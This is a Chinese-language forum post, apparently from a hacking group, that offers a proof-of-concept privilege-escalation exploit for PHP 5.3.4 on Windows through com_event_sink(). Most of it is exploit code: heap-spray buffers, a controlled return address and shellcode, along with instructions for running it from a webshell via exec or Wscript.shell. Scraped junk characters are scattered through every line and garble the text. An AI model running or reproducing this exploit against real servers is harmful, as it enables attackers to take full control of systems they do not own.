|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
5 T: @1 [ j8 B# x) J) a7 O7 S9 ~$ u( t/ h* F2 S
测试方法如下:cmd /c x:\php\php.exe x:\test.php
* K8 ]& S. _% y% V( B7 Z! E) v5 `4 r, @0 B6 A7 a
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php- u5 c7 g3 h0 z5 U2 ~. h
这里是两个测试的截图:$ b; M3 \. R. F# g! ^7 }
" D8 Q* F9 {4 M$ Y" S6 q$ i ]5 I j
@1 a, f- B- o- J; ]3 `% k1 r
, h: B( s* c1 C8 Q5 p6 Q$ M6 y5 O0 W! ~! o: [8 ?
成功利用此漏洞的攻击者将获得系统的最高权限* i. {- b& [7 I
Q' d4 u7 Z4 Q$ [ y c
( v+ z% R. Z' F# K) J
: g0 `6 T" X- Z, t3 c+ c# Z% j4 l1 t2 Z& L" R U
: c2 r! }2 Y+ V; c( W1 k关于漏洞分析稍后附上。一下是PoC代码:
( u& s, x- I2 E2 a+ A9 d: H( l' C. h
<?php
' P4 l4 n( r/ Q, R/ w* S( G8 e//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞; p& W7 b$ P* a3 ^
//$eip ="\x44\x43\x42\x41";/ y; O7 N1 x' z$ L% D0 p/ k
$eip= "\x4b\xe8\x57\x78";1 c& L$ ?% L8 [3 B
$eax ="\x80\x01\x8d\x04";
1 ]- w. F" L2 |$deodrant="";5 ?8 ]1 x$ `! g
$axespray = str_repeat($eip.$eax,0x80);% @; i2 c( r) ^1 j' r
//048d0190' z1 y b3 i* j5 q. G" g# G
echo strlen($axespray);
7 N7 E3 |( P2 T' t! k, {! B& Uecho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
2 e7 A4 u0 W8 R9 z, becho "Silic Group Hacker Army - BlackBap.Org";
+ k) o, M! ^- W//19200 ==4B32 4b00, B4 R8 }8 O+ G# M4 R3 r
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}( C. ? B7 E' U/ u' w
$terminate = "T";) D! G, H$ `6 W' z! c3 p) `* \4 t
$u[] =$deodrant;
* k0 r$ x- | E1 Q, H* X3 x/ c$r[] =$deodrant.$terminate;: ]+ j$ k& q( h {0 h6 q; N( w
$a[] =$deodrant.$terminate;
/ W: [ m- h; G4 e$s[] =$deodrant.$terminate;7 u5 X( S5 k. {& b/ ]" ^* f: l
//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的( a: b/ e3 `& u: {. X2 U
$vVar = new VARIANT(0x048d0000+180);
, ?, e6 K8 Y8 s$ X( \//弹窗代码(Shellcode): w& Q) X$ p; `1 N
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
7 l* b* I' F) l' b# T0 @$var2 = new VARIANT(0x41414242);1 E+ e+ ~( z; @
com_event_sink($vVar,$var2,$buffer);
/ c4 F. E5 j$ b9 Z# L; O?>
! |# [% Z* j; @ |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|